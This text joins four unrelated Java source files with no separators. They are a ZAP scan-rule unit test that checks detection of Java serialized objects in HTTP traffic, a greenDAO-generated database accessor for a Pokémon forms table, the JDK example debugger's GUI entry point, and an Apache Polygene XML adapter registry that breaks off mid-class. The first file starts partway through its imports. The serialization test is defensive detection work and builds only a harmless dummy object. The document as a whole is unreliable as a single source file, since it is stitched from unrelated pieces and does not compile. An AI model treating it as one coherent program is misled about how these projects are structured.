import org.parosproxy.paros.network.HttpMessage;
import org.zaproxy.addon.commonlib.CommonAlertTag;

/**
 * Unit tests for {@link JsoScanRule}.
 *
 * <p>Verifies that an alert is raised whenever Java Serialized Object (JSO) content is
 * detected in a header, cookie, query parameter, or body of a request or response —
 * whether raw, Base64-encoded, or URI-encoded — and that no alert is raised otherwise.
 */
class JsoScanRuleUnitTest extends PassiveScannerTest<JsoScanRule> {
    /* Testing JSO in response */
    @Test
    void shouldNotRaiseAlertGivenNoJsoHasBeenDetectedInResponse() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader("GET / HTTP/1.1");
        msg.setResponseHeader(
                "HTTP/1.1 200 OK\r\n" + "X-Custom-Info: NOPE\r\n" + "Set-Cookie: NOPE=NOPE");
        // When
        scanHttpResponseReceive(msg);
        // Then
        assertThat(alertsRaised, empty());
    }

    @Test
    void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInHeaderOfResponse() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader("GET / HTTP/1.1");
        String jso = Base64.getEncoder().encodeToString(createJso());
        msg.setResponseHeader("HTTP/1.1 200 OK\r\n" + "X-Custom-Info: " + jso + "\r\n");
        // When
        scanHttpResponseReceive(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInCookieOfResponse() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader("GET / HTTP/1.1");
        String jso = Base64.getEncoder().encodeToString(createJso());
        msg.setResponseHeader("HTTP/1.1 200 OK\r\n" + "Set-Cookie: CRUNCHY=" + jso + "\r\n");
        // When
        scanHttpResponseReceive(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenRawJsoMagicBytesAreDetectedInRawBodyOfResponse() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader("GET / HTTP/1.1");
        byte[] jso = createJso();
        msg.setResponseHeader(
                "HTTP/1.1 200 OK\r\n"
                        + "Content-Type: application/octet-stream\r\n"
                        + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n"
                        + "Content-Length: " + jso.length + "\r\n");
        msg.setResponseBody(jso);
        // When
        scanHttpResponseReceive(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInBodyOfResponse() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader("GET / HTTP/1.1");
        String jso = Base64.getEncoder().encodeToString(createJso());
        msg.setResponseHeader(
                "HTTP/1.1 200 OK\r\n"
                        + "Content-Type: application/octet-stream\r\n"
                        + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n"
                        + "Content-Length: " + jso.length() + "\r\n");
        msg.setResponseBody(jso);
        // When
        scanHttpResponseReceive(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    /* Testing JSO in request */
    @Test
    void shouldNotRaiseAlertGivenNoJsoHasBeenDetectedInRequest() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader(
                "GET / HTTP/1.1\r\n" + "X-Custom-Info: NOPE\r\n" + "Cookie: NOPE=NOPE\r\n");
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, empty());
    }

    @Test
    void shouldRaiseAlertGivenUriEncodedJsoMagicBytesAreDetectedInRequestParameterOfRequest()
            throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader("GET /some_action?q=" + createUriEncodedJso() + "&p=&m HTTP/1.1");
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInRequestParameterOfRequest()
            throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        String jso = Base64.getEncoder().encodeToString(createJso());
        msg.setRequestHeader("GET /some_action?q=" + jso + "&p=&m HTTP/1.1");
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenUriEncodedJsoMagicBytesAreDetectedInHeaderOfRequest()
            throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader("GET / HTTP/1.1\r\n" + "X-Custom-Info: " + createUriEncodedJso());
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInHeaderOfRequest() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        String jso = Base64.getEncoder().encodeToString(createJso());
        msg.setRequestHeader("GET / HTTP/1.1\r\n" + "X-Custom-Info: " + jso + "\r\n");
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenUriEncodedJsoMagicBytesAreDetectedInCookieOfRequest()
            throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        msg.setRequestHeader(
                "GET / HTTP/1.1\r\n" + "Cookie: CRUNCHY=" + createUriEncodedJso() + "\r\n");
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInCookieOfRequest() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        String jso = Base64.getEncoder().encodeToString(createJso());
        msg.setRequestHeader("GET / HTTP/1.1\r\n" + "Cookie: CRUNCHY=" + jso + "\r\n");
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenRawJsoMagicBytesAreDetectedInBodyOfRequest() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        byte[] jso = createJso();
        msg.setRequestHeader(
                "POST / HTTP/1.1\r\n"
                        + "Content-Type: application/octet-stream\r\n"
                        + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n"
                        + "Content-Length: " + jso.length + "\r\n");
        msg.setRequestBody(jso);
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInBodyOfRequest() throws Exception {
        // Given
        HttpMessage msg = new HttpMessage();
        String jso = Base64.getEncoder().encodeToString(createJso());
        msg.setRequestHeader(
                "GET / HTTP/1.1\r\n"
                        + "Content-Type: application/octet-stream\r\n"
                        + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n"
                        + "Content-Length: " + jso.length() + "\r\n");
        msg.setRequestBody(jso);
        // When
        scanHttpRequestSend(msg);
        // Then
        assertThat(alertsRaised, hasSize(1));
    }

    @Test
    void shouldReturnExpectedMappings() {
        // Given / When
        Map<String, String> tags = rule.getAlertTags();
        // Then
        assertThat(tags.size(), is(equalTo(2)));
        assertThat(
                tags.containsKey(CommonAlertTag.OWASP_2021_A04_INSECURE_DESIGN.getTag()),
                is(equalTo(true)));
        assertThat(
                tags.containsKey(CommonAlertTag.OWASP_2017_A08_INSECURE_DESERIAL.getTag()),
                is(equalTo(true)));
        assertThat(
                tags.get(CommonAlertTag.OWASP_2021_A04_INSECURE_DESIGN.getTag()),
                is(equalTo(CommonAlertTag.OWASP_2021_A04_INSECURE_DESIGN.getValue())));
        assertThat(
                tags.get(CommonAlertTag.OWASP_2017_A08_INSECURE_DESERIAL.getTag()),
                is(equalTo(CommonAlertTag.OWASP_2017_A08_INSECURE_DESERIAL.getValue())));
    }

    /**
     * Serializes a dummy {@link AnObject} and returns the raw bytes. A Java serialization
     * stream always starts with the JSO magic bytes (0xAC 0xED), which is what the rule
     * under test looks for.
     */
    private static byte[] createJso() throws IOException {
        AnObject anObject = new AnObject();
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(out);
        objectOutputStream.writeObject(anObject);
        return out.toByteArray();
    }

    /**
     * URL-encodes the JSO bytes, treating them as ISO-8859-1 text and percent-encoding
     * with UTF-8. NOTE(review): bytes above 0x7F therefore become multi-byte UTF-8
     * percent-escapes (0xAC -> %C2%AC); presumably the scan rule decodes the same way —
     * confirm against JsoScanRule's decoding.
     */
    private static String createUriEncodedJso() throws IOException {
        return URLEncoder.encode(
                new String(createJso(), StandardCharsets.ISO_8859_1),
                StandardCharsets.UTF_8.name());
    }

    @Override
    protected JsoScanRule createScanner() {
        return new JsoScanRule();
    }

    /**
     * Minimal serializable payload for the tests. Its only field is static and thus not
     * part of the serialized form — only the stream header/class descriptor matter here.
     */
    private static class AnObject implements Serializable {
        private static final long serialVersionUID = 1L;
        private static String value;

        public static String getValue() {
            return value;
        }

        public static void setValue(String value) {
            AnObject.value = value;
        }
    }
}
package com.company.professor;

import java.util.List;
import java.util.ArrayList;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteStatement;

import de.greenrobot.dao.AbstractDao;
import de.greenrobot.dao.Property;
import de.greenrobot.dao.internal.SqlUtils;
import de.greenrobot.dao.internal.DaoConfig;

import com.company.professor.PokemonForms;

// THIS CODE IS GENERATED BY greenDAO, DO NOT EDIT.
// (Regenerate via the greenDAO generator project instead of hand-editing.)
/**
 * DAO for table "pokemon_forms".
 */
public class PokemonFormsDao extends AbstractDao<PokemonForms, Long> {

    public static final String TABLENAME = "pokemon_forms";

    /**
     * Properties of entity PokemonForms.<br/>
     * Can be used for QueryBuilder and for referencing column names.
     */
    public static class Properties {
        public final static Property Id = new Property(0, long.class, "Id", true, "id");
        public final static Property Identifier = new Property(1, String.class, "Identifier", false, "identifier");
        public final static Property FormIdentifier = new Property(2, String.class, "FormIdentifier", false, "form_identifier");
        public final static Property PokemonId = new Property(3, long.class, "PokemonId", false, "pokemon_id");
        public final static Property IntroducedInVersionGroupId = new Property(4, Long.class, "IntroducedInVersionGroupId", false, "introduced_in_version_group_id");
        public final static Property IsDefault = new Property(5, boolean.class, "IsDefault", false, "is_default");
        public final static Property IsBattleOnly = new Property(6, boolean.class, "IsBattleOnly", false, "is_battle_only");
        public final static Property IsMega = new Property(7, boolean.class, "IsMega", false, "is_mega");
        public final static Property FormOrder = new Property(8, long.class, "FormOrder", false, "form_order");
        // "order" is an SQL keyword; the generated SQL always quotes it.
        public final static Property Order = new Property(9, long.class, "Order", false, "order");
    };

    private DaoSession daoSession;

    public PokemonFormsDao(DaoConfig config) {
        super(config);
    }

    public PokemonFormsDao(DaoConfig config, DaoSession daoSession) {
        super(config, daoSession);
        this.daoSession = daoSession;
    }

    /** Creates the underlying database table. */
    public static void createTable(SQLiteDatabase db, boolean ifNotExists) {
        String constraint = ifNotExists? "IF NOT EXISTS ": "";
        db.execSQL("CREATE TABLE " + constraint + "\"pokemon_forms\" (" + //
                "\"id\" INTEGER PRIMARY KEY NOT NULL ," + // 0: Id
                "\"identifier\" TEXT NOT NULL ," + // 1: Identifier
                "\"form_identifier\" TEXT," + // 2: FormIdentifier
                "\"pokemon_id\" INTEGER NOT NULL ," + // 3: PokemonId
                "\"introduced_in_version_group_id\" INTEGER," + // 4: IntroducedInVersionGroupId
                "\"is_default\" INTEGER NOT NULL ," + // 5: IsDefault
                "\"is_battle_only\" INTEGER NOT NULL ," + // 6: IsBattleOnly
                "\"is_mega\" INTEGER NOT NULL ," + // 7: IsMega
                "\"form_order\" INTEGER NOT NULL ," + // 8: FormOrder
                "\"order\" INTEGER NOT NULL );"); // 9: Order
    }

    /** Drops the underlying database table. */
    public static void dropTable(SQLiteDatabase db, boolean ifExists) {
        String sql = "DROP TABLE " + (ifExists ? "IF EXISTS " : "") + "\"pokemon_forms\"";
        db.execSQL(sql);
    }

    /** @inheritdoc */
    // Note: SQLiteStatement bind indices are 1-based, while property ordinals are 0-based.
    @Override
    protected void bindValues(SQLiteStatement stmt, PokemonForms entity) {
        stmt.clearBindings();
        stmt.bindLong(1, entity.getId());
        stmt.bindString(2, entity.getIdentifier());

        String FormIdentifier = entity.getFormIdentifier();
        if (FormIdentifier != null) {
            stmt.bindString(3, FormIdentifier);
        }
        stmt.bindLong(4, entity.getPokemonId());

        Long IntroducedInVersionGroupId = entity.getIntroducedInVersionGroupId();
        if (IntroducedInVersionGroupId != null) {
            stmt.bindLong(5, IntroducedInVersionGroupId);
        }
        // booleans are stored as 0/1 INTEGER columns
        stmt.bindLong(6, entity.getIsDefault() ? 1L: 0L);
        stmt.bindLong(7, entity.getIsBattleOnly() ? 1L: 0L);
        stmt.bindLong(8, entity.getIsMega() ? 1L: 0L);
        stmt.bindLong(9, entity.getFormOrder());
        stmt.bindLong(10, entity.getOrder());
    }

    @Override
    protected void attachEntity(PokemonForms entity) {
        super.attachEntity(entity);
        entity.__setDaoSession(daoSession);
    }

    /** @inheritdoc */
    @Override
    public Long readKey(Cursor cursor, int offset) {
        return cursor.getLong(offset + 0);
    }

    /** @inheritdoc */
    @Override
    public PokemonForms readEntity(Cursor cursor, int offset) {
        PokemonForms entity = new PokemonForms( //
            cursor.getLong(offset + 0), // Id
            cursor.getString(offset + 1), // Identifier
            cursor.isNull(offset + 2) ? null : cursor.getString(offset + 2), // FormIdentifier
            cursor.getLong(offset + 3), // PokemonId
            cursor.isNull(offset + 4) ? null : cursor.getLong(offset + 4), // IntroducedInVersionGroupId
            cursor.getShort(offset + 5) != 0, // IsDefault
            cursor.getShort(offset + 6) != 0, // IsBattleOnly
            cursor.getShort(offset + 7) != 0, // IsMega
            cursor.getLong(offset + 8), // FormOrder
            cursor.getLong(offset + 9) // Order
        );
        return entity;
    }

    /** @inheritdoc */
    @Override
    public void readEntity(Cursor cursor, PokemonForms entity, int offset) {
        entity.setId(cursor.getLong(offset + 0));
        entity.setIdentifier(cursor.getString(offset + 1));
        entity.setFormIdentifier(cursor.isNull(offset + 2) ? null : cursor.getString(offset + 2));
        entity.setPokemonId(cursor.getLong(offset + 3));
        entity.setIntroducedInVersionGroupId(cursor.isNull(offset + 4) ? null : cursor.getLong(offset + 4));
        entity.setIsDefault(cursor.getShort(offset + 5) != 0);
        entity.setIsBattleOnly(cursor.getShort(offset + 6) != 0);
        entity.setIsMega(cursor.getShort(offset + 7) != 0);
        entity.setFormOrder(cursor.getLong(offset + 8));
        entity.setOrder(cursor.getLong(offset + 9));
    }

    /** @inheritdoc */
    @Override
    protected Long updateKeyAfterInsert(PokemonForms entity, long rowId) {
        entity.setId(rowId);
        return rowId;
    }

    /** @inheritdoc */
    @Override
    public Long getKey(PokemonForms entity) {
        if(entity != null) {
            return entity.getId();
        } else {
            return null;
        }
    }

    /** @inheritdoc */
    @Override
    protected boolean isEntityUpdateable() {
        return true;
    }

    // Lazily-built SELECT that LEFT JOINs the to-one relations (pokemon, version_groups).
    private String selectDeep;

    protected String getSelectDeep() {
        if (selectDeep == null) {
            StringBuilder builder = new StringBuilder("SELECT ");
            SqlUtils.appendColumns(builder, "T", getAllColumns());
            builder.append(',');
            SqlUtils.appendColumns(builder, "T0", daoSession.getPokemonDao().getAllColumns());
            builder.append(',');
            SqlUtils.appendColumns(builder, "T1", daoSession.getVersionGroupsDao().getAllColumns());
            builder.append(" FROM pokemon_forms T");
            builder.append(" LEFT JOIN pokemon T0 ON T.\"pokemon_id\"=T0.\"id\"");
            builder.append(" LEFT JOIN version_groups T1 ON T.\"introduced_in_version_group_id\"=T1.\"id\"");
            builder.append(' ');
            selectDeep = builder.toString();
        }
        return selectDeep;
    }

    protected PokemonForms loadCurrentDeep(Cursor cursor, boolean lock) {
        PokemonForms entity = loadCurrent(cursor, 0, lock);
        int offset = getAllColumns().length;

        Pokemon Pokemon = loadCurrentOther(daoSession.getPokemonDao(), cursor, offset);
        if(Pokemon != null) {
            entity.setPokemon(Pokemon);
        }
        offset += daoSession.getPokemonDao().getAllColumns().length;

        // May be null (nullable FK introduced_in_version_group_id).
        VersionGroups VersionGroups = loadCurrentOther(daoSession.getVersionGroupsDao(), cursor, offset);
        entity.setVersionGroups(VersionGroups);

        return entity;
    }

    public PokemonForms loadDeep(Long key) {
        assertSinglePk();
        if (key == null) {
            return null;
        }

        StringBuilder builder = new StringBuilder(getSelectDeep());
        builder.append("WHERE ");
        SqlUtils.appendColumnsEqValue(builder, "T", getPkColumns());
        String sql = builder.toString();

        String[] keyArray = new String[] { key.toString() };
        Cursor cursor = db.rawQuery(sql, keyArray);

        try {
            boolean available = cursor.moveToFirst();
            if (!available) {
                return null;
            } else if (!cursor.isLast()) {
                throw new IllegalStateException("Expected unique result, but count was " + cursor.getCount());
            }
            return loadCurrentDeep(cursor, true);
        } finally {
            cursor.close();
        }
    }

    /** Reads all available rows from the given cursor and returns a list of new PokemonForms objects. */
    public List<PokemonForms> loadAllDeepFromCursor(Cursor cursor) {
        int count = cursor.getCount();
        List<PokemonForms> list = new ArrayList<PokemonForms>(count);

        if (cursor.moveToFirst()) {
            if (identityScope != null) {
                identityScope.lock();
                identityScope.reserveRoom(count);
            }
            try {
                do {
                    list.add(loadCurrentDeep(cursor, false));
                } while (cursor.moveToNext());
            } finally {
                if (identityScope != null) {
                    identityScope.unlock();
                }
            }
        }
        return list;
    }

    protected List<PokemonForms> loadDeepAllAndCloseCursor(Cursor cursor) {
        try {
            return loadAllDeepFromCursor(cursor);
        } finally {
            cursor.close();
        }
    }

    /** A raw-style query where you can pass any WHERE clause and arguments. */
    public List<PokemonForms> queryDeep(String where, String... selectionArg) {
        Cursor cursor = db.rawQuery(getSelectDeep() + where, selectionArg);
        return loadDeepAllAndCloseCursor(cursor);
    }

}
/*
 * Copyright (c) 1998, 1999, Oracle and/or its affiliates. All rights reserved.
 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
 *
 * This code is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License version 2 only, as
 * published by the Free Software Foundation.  Oracle designates this
 * particular file as subject to the "Classpath" exception as provided
 * by Oracle in the LICENSE file that accompanied this code.
 *
 * This code is distributed in the hope that it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License
 * version 2 for more details (a copy is included in the LICENSE file that
 * accompanied this code).
 *
 * You should have received a copy of the GNU General Public License version
 * 2 along with this work; if not, write to the Free Software Foundation,
 * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
 *
 * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
 * or visit www.oracle.com if you need additional information or have any
 * questions.
 */

package com.sun.tools.example.debug.gui;

import java.io.*;
import javax.swing.*;
import javax.swing.border.*;
import java.awt.*;
import java.awt.event.*;

import com.sun.jdi.*;
import com.sun.tools.example.debug.bdi.*;

/**
 * Main panel and entry point of the example JDI debugger ("javadt").
 * Builds the Swing tool layout in the constructor; {@link #main} parses the
 * command line, configures the {@link Environment}, and shows the top-level frame.
 */
public class GUI extends JPanel {

    private static final long serialVersionUID = 3292463234530679091L;
    private CommandTool cmdTool;
    private ApplicationTool appTool;
    //###HACK##
    //### There is currently dirty code in Environment that
    //### accesses this directly.
    //private SourceTool srcTool;
    public static SourceTool srcTool;

    private SourceTreeTool sourceTreeTool;
    private ClassTreeTool classTreeTool;
    private ThreadTreeTool threadTreeTool;

    private StackTraceTool stackTool;
    private MonitorTool monitorTool;

    public static final String progname = "javadt";
    public static final String version = "1.0Beta"; //### FIX ME.
    public static final String windowBanner = "Java(tm) platform Debug Tool";

    private Font fixedFont = new Font("monospaced", Font.PLAIN, 10);

    // Assembles the nested split-pane layout: trees + source/stack/monitor on top,
    // command/application tools on the bottom.
    private GUI(Environment env) {
        setLayout(new BorderLayout());
        setBorder(new EmptyBorder(5, 5, 5, 5));
        add(new JDBToolBar(env), BorderLayout.NORTH);

        srcTool = new SourceTool(env);
        srcTool.setPreferredSize(new java.awt.Dimension(500, 300));
        srcTool.setTextFont(fixedFont);

        stackTool = new StackTraceTool(env);
        stackTool.setPreferredSize(new java.awt.Dimension(500, 100));

        monitorTool = new MonitorTool(env);
        monitorTool.setPreferredSize(new java.awt.Dimension(500, 50));

        JSplitPane right = new JSplitPane(JSplitPane.VERTICAL_SPLIT, srcTool,
                new JSplitPane(JSplitPane.VERTICAL_SPLIT, stackTool, monitorTool));

        sourceTreeTool = new SourceTreeTool(env);
        sourceTreeTool.setPreferredSize(new java.awt.Dimension(200, 450));

        classTreeTool = new ClassTreeTool(env);
        classTreeTool.setPreferredSize(new java.awt.Dimension(200, 450));

        threadTreeTool = new ThreadTreeTool(env);
        threadTreeTool.setPreferredSize(new java.awt.Dimension(200, 450));

        JTabbedPane treePane = new JTabbedPane(SwingConstants.BOTTOM);
        treePane.addTab("Source", null, sourceTreeTool);
        treePane.addTab("Classes", null, classTreeTool);
        treePane.addTab("Threads", null, threadTreeTool);

        JSplitPane centerTop = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT, treePane, right);

        cmdTool = new CommandTool(env);
        cmdTool.setPreferredSize(new java.awt.Dimension(700, 150));

        appTool = new ApplicationTool(env);
        appTool.setPreferredSize(new java.awt.Dimension(700, 200));

        JSplitPane centerBottom = new JSplitPane(JSplitPane.VERTICAL_SPLIT, cmdTool, appTool);
        // centerBottom.setPreferredSize(new java.awt.Dimension(700, 350));

        JSplitPane center = new JSplitPane(JSplitPane.VERTICAL_SPLIT, centerTop, centerBottom);

        add(center, BorderLayout.CENTER);
    }

    // Prints command-line help to stdout; callers System.exit after invoking this.
    private static void usage() {
        String separator = File.pathSeparator;
        System.out.println("Usage: " + progname + " <options> <class> <arguments>");
        System.out.println();
        System.out.println("where options include:");
        System.out.println(" -help print out this message and exit");
        System.out.println(" -sourcepath <directories separated by \"" + separator + "\">");
        System.out.println(" list directories in which to look for source files");
        System.out.println(" -remote <hostname>:<port-number>");
        System.out.println(" host machine and port number of interpreter to attach to");
        System.out.println(" -dbgtrace [flags] print info for debugging " + progname);
        System.out.println();
        System.out.println("options forwarded to debuggee process:");
        System.out.println(" -v -verbose[:class|gc|jni]");
        System.out.println(" turn on verbose mode");
        System.out.println(" -D<name>=<value> set a system property");
        System.out.println(" -classpath <directories separated by \"" + separator + "\">");
        System.out.println(" list directories in which to look for classes");
        System.out.println(" -X<option> non-standard debuggee VM option");
        System.out.println();
        System.out.println("<class> is the name of the class to begin debugging");
        System.out.println("<arguments> are the arguments passed to the main() method of <class>");
        System.out.println();
        System.out.println("For command help type 'help' at " + progname + " prompt");
    }

    /**
     * Entry point: parses argv (debugger options, options forwarded to the debuggee VM,
     * then the main class and its arguments), configures the Environment, and shows the UI.
     */
    public static void main(String argv[]) {
        String clsName = "";
        String progArgs = "";
        String javaArgs = "";
        final Environment env = new Environment();

        JPanel mainPanel = new GUI(env);

        ContextManager context = env.getContextManager();
        ExecutionManager runtime = env.getExecutionManager();

        for (int i = 0; i < argv.length; i++) {
            String token = argv[i];
            if (token.equals("-dbgtrace")) {
                // Optional numeric flags argument; defaults to TRACE_ALL.
                if ((i == argv.length - 1) ||
                    ! Character.isDigit(argv[i+1].charAt(0))) {
                    runtime.setTraceMode(VirtualMachine.TRACE_ALL);
                } else {
                    String flagStr = argv[++i];
                    runtime.setTraceMode(Integer.decode(flagStr).intValue());
                }
            } else if (token.equals("-X")) {
                System.out.println(
                    "Use 'java -X' to see the available non-standard options");
                System.out.println();
                usage();
                System.exit(1);
            } else if (
                // Standard VM options passed on
                token.equals("-v") || token.startsWith("-v:") || // -v[:...]
                token.startsWith("-verbose") ||                  // -verbose[:...]
                token.startsWith("-D") ||
                // NonStandard options passed on
                token.startsWith("-X") ||
                // Old-style options
                // (These should remain in place as long as the standard VM accepts them)
                token.equals("-noasyncgc") || token.equals("-prof") ||
                token.equals("-verify") || token.equals("-noverify") ||
                token.equals("-verifyremote") ||
                token.equals("-verbosegc") ||
                token.startsWith("-ms") || token.startsWith("-mx") ||
                token.startsWith("-ss") || token.startsWith("-oss") ) {
                javaArgs += token + " ";
            } else if (token.equals("-sourcepath")) {
                if (i == (argv.length - 1)) {
                    System.out.println("No sourcepath specified.");
                    usage();
                    System.exit(1);
                }
                env.getSourceManager().setSourcePath(new SearchPath(argv[++i]));
            } else if (token.equals("-classpath")) {
                if (i == (argv.length - 1)) {
                    System.out.println("No classpath specified.");
                    usage();
                    System.exit(1);
                }
                env.getClassManager().setClassPath(new SearchPath(argv[++i]));
            } else if (token.equals("-remote")) {
                if (i == (argv.length - 1)) {
                    System.out.println("No remote specified.");
                    usage();
                    System.exit(1);
                }
                env.getContextManager().setRemotePort(argv[++i]);
            } else if (token.equals("-help")) {
                usage();
                System.exit(0);
            } else if (token.equals("-version")) {
                System.out.println(progname + " version " + version);
                System.exit(0);
            } else if (token.startsWith("-")) {
                System.out.println("invalid option: " + token);
                usage();
                System.exit(1);
            } else {
                // Everything from here is part of the command line
                clsName = token;
                for (i++; i < argv.length; i++) {
                    progArgs += argv[i] + " ";
                }
                break;
            }
        }

        context.setMainClassName(clsName);
        context.setProgramArguments(progArgs);
        context.setVmArguments(javaArgs);

        // Force Cross Platform L&F
        try {
            UIManager.setLookAndFeel(UIManager.getCrossPlatformLookAndFeelClassName());
            // If you want the System L&F instead, comment out the above line and
            // uncomment the following:
            // UIManager.setLookAndFeel(UIManager.getSystemLookAndFeelClassName());
        } catch (Exception exc) {
            System.err.println("Error loading L&F: " + exc);
        }

        JFrame frame = new JFrame();
        frame.setBackground(Color.lightGray);
        frame.setTitle(windowBanner);
        frame.setJMenuBar(new JDBMenuBar(env));
        frame.setContentPane(mainPanel);
        frame.addWindowListener(new WindowAdapter() {
            @Override
            public void windowClosing(WindowEvent e) {
                env.terminate();
            }
        });

        frame.pack();
        frame.setVisible(true);
    }
}
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.polygene.serialization.javaxxml;

import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.BiFunction;
import java.util.function.Function;
import org.apache.polygene.api.injection.scope.This;
import org.apache.polygene.api.injection.scope.Uses;
import org.apache.polygene.api.mixin.Initializable;
import org.apache.polygene.api.mixin.Mixins;
import org.apache.polygene.api.serialization.Converters;
import org.apache.polygene.api.service.ServiceDescriptor;
import org.apache.polygene.api.type.ValueType;
import org.apache.polygene.spi.serialization.BuiltInConverters;
import org.w3c.dom.Document;
import org.w3c.dom.Node;

import static org.apache.polygene.api.type.HasTypesCollectors.closestType;
import static org.apache.polygene.serialization.javaxxml.JavaxXmlSettings.orDefault;

/**
 * Registry of {@link JavaxXmlAdapter}s used by the javax.xml serialization.
 * Adapters are looked up by {@link ValueType}; see {@code adapterFor(ValueType)}.
 */
@Mixins( JavaxXmlAdapters.Mixin.class )
public interface JavaxXmlAdapters
{
    /** Registers (or replaces) the adapter used for the given value type. */
    void registerAdapter( ValueType valueType, JavaxXmlAdapter<?> adapter );

    /** Returns the adapter for the closest matching registered type, or {@code null} if none. */
    <T> JavaxXmlAdapter<T> adapterFor( ValueType valueType );

    default <T> JavaxXmlAdapter<T> adapterFor( Class<T> type )
    {
        return adapterFor( ValueType.of( type ) );
    }

    class Mixin implements JavaxXmlAdapters, Initializable
    {
        // LinkedHashMap: registration order is preserved; later explicit registrations
        // can shadow the base adapters installed in initialize().
        private Map<ValueType, JavaxXmlAdapter<?>> adapters = new LinkedHashMap<>();

        @Uses
        private ServiceDescriptor descriptor;

        @This
        private BuiltInConverters builtInConverters;

        @This
        private Converters converters;

        /**
         * Applies {@link JavaxXmlSettings} (converters first, then adapters) and then
         * installs the base adapters for the primitive value types.
         */
        @Override
        public void initialize() throws Exception
        {
            JavaxXmlSettings settings = orDefault( descriptor.metaInfo( JavaxXmlSettings.class ) );
            settings.getConverters()
                    .forEach( ( type, converter ) -> converters.registerConverter( type, converter ) );
            builtInConverters.registerBuiltInConverters( converters );
            settings.getAdapters().forEach( adapters::put );
            registerBaseJavaxXmlAdapters();
        }

        @Override
        public void registerAdapter( final ValueType valueType, final JavaxXmlAdapter<?> adapter )
        {
            adapters.put( valueType, adapter );
        }

        @Override
        public <T> JavaxXmlAdapter<T> adapterFor( final ValueType valueType )
        {
            // closestType picks the registered type nearest to the requested one;
            // returns null when no registered type matches.
            return castAdapter( adapters.keySet().stream()
                                        .collect( closestType( valueType ) )
                                        .map( adapters::get )
                                        .orElse( null ) );
        }

        @SuppressWarnings( "unchecked" )
        private <T> JavaxXmlAdapter<T> castAdapter( JavaxXmlAdapter<?> adapter )
        {
            return (JavaxXmlAdapter<T>) adapter;
        }

        private void registerBaseJavaxXmlAdapters()
        {
            // Primitive Value types
            adapters.put( ValueType.STRING, new StringAdapter() );
            adapters.put( ValueType.CHARACTER, new CharacterAdapter() );
            adapters.put( ValueType.BOOLEAN, new BooleanAdapter() );
            adapters.put( ValueType.INTEGER, new IntegerAdapter() );
            adapters.put( ValueType.LONG, new LongAdapter() );
            adapters.put( ValueType.SHORT, new ShortAdapter() );
            adapters.put( ValueType.BYTE, new ByteAdapter() );
            adapters.put( ValueType.FLOAT, new FloatAdapter() );
            adapters.put( ValueType.DOUBLE, new DoubleAdapter() );
        }

